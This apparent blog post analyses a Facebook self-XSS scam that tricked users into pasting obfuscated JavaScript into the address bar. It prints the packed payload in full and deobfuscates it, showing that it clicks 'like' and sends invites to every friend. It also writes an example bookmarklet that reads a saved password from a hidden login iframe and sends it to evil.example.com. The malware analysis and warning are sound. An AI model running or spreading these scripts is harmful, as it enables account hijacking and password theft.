Facebook social engineering XSS

Found in the wild (http://www.facebook.com/pages/Teacher-asked-Why-do-Boys-Walk-faster-then-Girls-Girls-Talk-more-then-Boys/125748790772279) attempts to trick users by instructing them to type CTRL+C, to copy hidden javascript, then Alt+D to highlight the address bar to paste and run this javascript:

javascript:(function(){a=’app121760014508794_iji’;b=’app121760014508794_aja’;rew=’app121760014508794_rew’;qwe=’app121760014508794_qwe’;qtt=’app121760014508794_qtt’;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘P e=[“\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D”,”\\l\\h\\D\\k\\f”,”\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x”,”\\y\\g\\x\\x\\f\\j”,”\\g\\j\\j\\f\\z\\R\\K\\L\\S”,”\\p\\n\\k\\A\\f”,”\\l\\A\\o\\o\\f\\l\\h”,”\\k\\g\\G\\f\\q\\f”,”\\l\\k\\g\\j\\G”,”\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l”,”\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h”,”\\t\\k\\g\\t\\G”,”\\g\\j\\g\\h\\v\\p\\f\\j\\h”,”\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h”,”\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k”,”\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q”,”\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u”,”\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o”,”\\g\\j\\u\\A\\h”,”\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f”,”\\Z\\y\\n\\z\\f”,”\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h”];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);’,62,85,’||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||qtt|fs|SocialGraphManager|for|in|if|20|qwe|rew|21|2000|4000|3000′.split(‘|’),0,{}))})();

______________________________________

Looks like the “Dean Edwards packing tool” And according to http://www.strictly-software.com/unpacker here is the unpacked code:
______________________________________

var variables = [“\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79”, “\x73\x74\x79\x6C\x65”, “\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64”, “\x68\x69\x64\x64\x65\x6E”, “\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C”, “\x76\x61\x6C\x75\x65”, “\x73\x75\x67\x67\x65\x73\x74”, “\x6C\x69\x6B\x65\x6D\x65”, “\x73\x6C\x69\x6E\x6B”, “\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73”, “\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74”, “\x63\x6C\x69\x63\x6B”, “\x69\x6E\x69\x74\x45\x76\x65\x6E\x74”, “\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74”, “\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C”, “\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D”, “\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70”, “\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67”, “\x69\x6E\x70\x75\x74”, “\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65”, “\x53\x68\x61\x72\x65”, “\x70\x6F\x70\x5F\x63\x6F\x6E\x74\x65\x6E\x74”];
d = document;
d[variables[2]](qtt)[variables[1]][variables[0]] = variables[3];
d[variables[2]](a)[variables[4]] = d[variables[2]](b)[variables[5]];
s = d[variables[2]](variables[6]);
m = d[variables[2]](variables[7]);
sl = d[variables[2]](variables[8]);
c = d[variables[10]](variables[9]);
c[variables[12]](variables[11], true, true);
s[variables[13]](c);
setTimeout(function () {
fs[variables[14]]()
},
5000);
setTimeout(function () {
SocialGraphManager[variables[17]](variables[15], variables[16]);
setTimeout(function () {
c[variables[12]](variables[11], true, true);
sl[variables[13]](c);
setTimeout(function () {
inp = document[variables[19]](variables[18]);
for (i in inp) {
if (inp[i][variables[5]] == variables[20]) {
inp[i][variables[13]](c)
}
};
m[variables[13]](c);
setTimeout(function () {
d[variables[2]](qwe)[variables[4]] = d[variables[2]](rew)[variables[5]];
},
2000)
},
4000)
},
3000)
},
5000);

______________________________________

After writing a few js lines in firebug to dehex the variables:

outputstring=”[“;
for(var i=0;i<variables.length;i++)
outputstring+=”\””+variables[i]+”\”, “;alert(outputstring);

we get:

var variables = [“visibility”, “style”, “getElementById”, “hidden”, “innerHTML”, “value”, “suggest”, “likeme”, “slink”, “MouseEvents”, “createEvent”, “click”, “initEvent”, “dispatchEvent”, “select_all”, “sgm_invite_form”, “/ajax/social_graph/invite_dialog.php”, “submitDialog”, “input”, “getElementsByTagName”, “Share”, “pop_content”];

and substitute the variables in the source:

for(var i=0;i<variables.length;i++)
src=src.replace(new RegExp(‘variables\\[‘+i+’\\]’,’g’), ‘”‘+variables[i]+'”‘)

we get a well-deobfuscated source:
______________________________________

d = document;
d[“getElementById”](qtt)[“style”][“visibility”] = “hidden”;
d[“getElementById”](a)[“innerHTML”] = d[“getElementById”](b)[“value”];
s = d[“getElementById”](“suggest”);
m = d[“getElementById”](“likeme”);
sl = d[“getElementById”](“slink”);
c = d[“createEvent”](“MouseEvents”);
c[“initEvent”](“click”, true, true);
s[“dispatchEvent”](c);
setTimeout(function () {
fs[“select_all”]()
},
5000);
setTimeout(function () {
SocialGraphManager[“submitDialog”](“sgm_invite_form”, “/ajax/social_graph/invite_dialog.php”);
setTimeout(function () {
c[“initEvent”](“click”, true, true);
sl[“dispatchEvent”](c);
setTimeout(function () {
inp = document[“getElementsByTagName”](“input”);
for (i in inp) {
if (inp[i][“value”] == “Share”) {
inp[i][“dispatchEvent”](c)
}
};
m[“dispatchEvent”](c);
setTimeout(function () {
d[“getElementById”](qwe)[“innerHTML”] = d[“getElementById”](rew)[“value”];
},
2000)
},
4000)
},
3000)
},5000);

Which clearly invokes, by simulated mouse click, liking the app and suggesting the app to all your friends. It could be worse, and steal your password if you have it saved on the login page:

javascript:(function(){var ifr = document.createElement(“iframe”);ifr.src=”/login.php”;ifr.height=0;ifr.width=0;document.body.appendChild(ifr);setTimeout(function(){var mypass=ifr.contentWindow.document.getElementById(“pass”).value;new Image().src=”http://evil.example.com/evil.php?pass=”+mypass;alert(“Your password is “+mypass+” and I just sent it to evil.example.com”);},1000);})();

or send you exploits or defriend all your friends… Maybe people will use this as a learning opportunity so if something actually bad does happen, they won’t get hit.

Advertisements
  1. Leave a comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: